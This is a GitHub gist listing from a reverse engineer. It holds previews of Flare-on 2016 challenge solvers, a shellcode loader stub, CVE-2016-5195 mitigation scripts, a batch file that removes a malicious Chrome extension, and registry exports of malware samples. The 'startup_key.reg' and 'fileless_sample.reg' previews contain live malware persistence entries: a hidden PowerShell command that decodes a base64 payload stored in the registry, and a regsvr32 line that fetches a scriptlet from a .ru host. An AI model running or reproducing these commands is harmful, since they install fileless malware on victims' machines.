Skip to content

Instantly share code, notes, and snippets.

View levisre's full-sized avatar
💭
I may be slow to respond.

Levis Nickaster levisre

💭
I may be slow to respond.
71 followers · 9 following
View GitHub Profile
@levisre
levisre / shy.bat
Created June 26, 2017 08:09
@echo off
IF EXIST "%USERPROFILE%\AppData\Local\Google" (
ECHO "Checking Chrome"
CD "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Extensions"
IF EXIST "ldobpmmlhhamdbpcipmehcibdlkoliah" (
ECHO "Found Malicious Extension in %COMPUTERNAME%. Removing..."
RMDIR /q "ldobpmmlhhamdbpcipmehcibdlkoliah"
) ELSE (
ECHO "SAFE!"
)
@levisre
levisre / startup_key.reg
Created May 19, 2017 09:48
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"iCloudPhotos"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudPhotos.exe"
"iCloudServices"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudServices.exe"
"UniKey"="C:\\Program Files\\UniKey\\UniKeyNT.exe"
"{C3A46F5D-381E-4E87-83B8-E06D4A32AD32}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\MTBLHVGZMZY').PSphLsFbvEgBoa)));"
"Skype"="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" /minimized /regrun"
"COM+"="regsvr32 /s /n /u /i:http://server2.bjdnxbgp3.ru/setup.xml scrobj.dll"
@levisre
levisre / fileless_sample.reg
Created May 19, 2017 09:47
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\MTBLHVGZMZY]
"PSphLsFbvEgBoa"="JFpwR2l5RkRKWnJsID0gJ01UQkxIVkdaTVpZJzsgDQokUU1VRlNESFZCSlVZTUJIR0NMID0gJ3s2QTUyNjZBMy1DNEJGLTQ5N0EtODBBQy01NzMwN0YzMzRGNTh9JzsNCiRDREFUUk9RQVVCQ1FGVFJQWFVZID0gJ3tCRjBFQThCRS1FNTNGLTQ5M0MtQjhCNy01MjkzMzQ5QzE5RDV9JzsNCkZ1bmN0aW9uIE1DTkZJSExNRERBRUV7DQoJUGFyYW0oW1BhcmFtZXRlciggUG9zaXRpb24gPSAwLCBNYW5kYXRvcnkgPSAkdHJ1ZSApXVtCeXRlW11dJFRJWVVETExWUEVOSEFPS1YsW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEsIE1hbmRhdG9yeSA9ICR0cnVlKV1bQnl0ZVtdXSRNRFFGTVBaVElVKQ0KCVtCeXRlW11dJGsgPSBOZXctT2JqZWN0IEJ5dGVbXSAyNTY7DQoJW0J5dGVbXV0kcyA9IE5ldy1PYmplY3QgQnl0ZVtdIDI1NjsNCglmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJCSRzWyRpXSA9IFtCeXRlXSRpOw0KCQkka1skaV0gPSAkTURRRk1QWlRJVVskaSAlICRNRFFGTVBaVElVLkxlbmd0aF07DQoJfQ0KCSRwID0gMDsNCglmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJCSRwID0gKCRwICsgJHNbJGldICsgJGtbJGldKSAlIDI1NjsNCgkJJHNbJGldLCRzWyRwXSA9ICRzWyRwXSwkc1skaV07DQoJfQ0KCSRpID0gMDskcCA9IDA7DQoJZm9yICgkYyA9IDA7ICRjIC1sdCAkVElZVURMTFZQRU5
@levisre
levisre / Flareon_2016_Chall6.py
Created November 11, 2016 03:26
Flare-on 2016 Challenge 6 Solver
import hashlib
def solver(win_msg):
tmp = "312a232f272e27313162322e372548"
stuffs = [67,
139,
119,
165,
232,
86,
@levisre
levisre / Flareon_2016_Chall8.py
Created November 11, 2016 03:21
Flare-on 2016 Challenge 8 Solver
xorTable = [0xC5,0x38,0xE1,0x4A,0x1B,0x0C,0x1A,0x46,0x46,0x0A,0x96,0x29,0x73,0x73,0xA4,0x69,0x03,0x00,0x1B,0xA8,0xF8,0xB8,0x24,0x16,0xD6,0x09,0xCB][::-1]
encodedFlag = [0x8F,0xBC,0xDF,0x23,0x27,0x49,0x34,0x61,0x2F,0xF7,0x8E,0x34,0x67,0x97,0xAB,0x06,0x62,0x69,0xD6,0x7D,0x2F,0xF2,0x1C,0xA3,0xB0,0xAF][::-1]
print ''.join(chr((xorTable[i]^xorTable[i+1])^encodedFlag[i]) for i in range(0,len(encodedFlag)))[::-1]
@levisre
levisre / Flareon_2016_Chall7_Bruteforce.py
Created November 11, 2016 02:57
Flare-on 2016 Challenge 7 Bruteforcer to get original Hash
# Flare-on 2016 Challenge 7 Hashtable Brute-forcer
# Note: It's not a SHA1 brute-forcer
# It will prints out all possible value to fullfill the algorithm in the binary file
# The correct hash table is the first one which hash "3C" at the first position.
# You can recheck it
hextable = [0x03, 0x72, 0xD7, 0xE5, 0x03, 0xAB, 0xE0, 0xD4, 0x9F, 0xB0, 0xAE, 0x4E, 0x9D, 0x4A, 0x97, 0xAE, 0xE7, 0xEB, 0x42, 0xEF, 0xB0, 0x80, 0x8F, 0x49, 0x9F, 0x1E, 0x28, 0xED, 0x7E, 0x42, 0x80, 0xBC, 0x14, 0xA7, 0x53, 0xA6, 0x0A, 0xA1, 0xDE, 0x43, 0xEC, 0x65, 0xF0, 0x3A, 0x67, 0x66, 0x3C, 0x4A, 0xE7, 0x69, 0xBB, 0x24, 0x25, 0x47, 0x57, 0x2E, 0x59, 0x26, 0x0A, 0x36, 0x95, 0xC4, 0x44, 0xD3, 0xFD, 0x85, 0xB0, 0x47, 0x35, 0xA6, 0x47, 0xBC, 0x83, 0x94, 0xEF, 0x03, 0x6C, 0x73, 0x05, 0xAC, 0xB2, 0x8A, 0xD0, 0x20, 0x9E, 0x7D, 0x18, 0xD4, 0xA6, 0x21, 0xEA, 0x46, 0x03, 0x9E, 0x4D, 0x5F, 0xC9, 0x2E, 0x20, 0xC0, 0xF0, 0x81, 0x17, 0x40, 0x0C, 0x09, 0x5C, 0x57, 0xE4, 0x86, 0x72, 0x05, 0x60, 0x1D, 0x0B, 0x43, 0x5D, 0x4A, 0x34, 0x85, 0x53, 0x10, 0xC
@levisre
levisre / Flareon_2016_chall4.c
Created November 11, 2016 02:50
Flare-on 2016 Level 4 Solver
/*
Flare-on 2016 Challenge 4 Solver
By Levis Nickaster.
Note: Put the dll file in the same folder before run the compiled exe
*/
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "flareon2016challenge.dll"
@levisre
levisre / ShellcodeLoader.c
Created November 11, 2016 02:46
Simple Shellcode Loader coded in C. The shellcode must be in binary form
#include <stdio.h>
#include <stdlib.h>
// enable cross compiling
#ifdef __linux__
#include <sys/mman.h>
#elif _WIN32 || _MINGW_
#include <windows.h>
#endif
@levisre
levisre / get_package.sh
Last active October 27, 2016 10:22
Bulk crawl and get Link about neccessary Packages that needed to mitigate CVE-2016-5195 with SystemTap on CentOS
#!/bin/sh
#####################################################################
# Get Packages for CVE-2016-5195 mitigation with SystemTap #
# NOTE: SOME CASE IT DOESN'T WORK WITH CentOS 5 #
# Good for bulk download and fix system with various kernel version #
# Written by Levis Nickaster #
#####################################################################
# get kernel version and linux archilecture
# Usage: ./get_info.sh <kernel_version> (i686|x86_x64)
@levisre
levisre / cve-2016-5195_mitigation.sh
Created October 26, 2016 07:21
Use systemtap with script to mitigate CVE-2016-5195 (for CentOS vX.X)
#!/bin/sh
###################################
# CVE-2016-5195 Mitigation Script #
###################################
#LINUX_ARCH = $(uname -m)
#KERNEL_VER = $(uname -r)
#NOTE: RUN AS ROOT, MUST BE CONNTECTED TO INTERNET
echo "Removing unused kernel-devel..."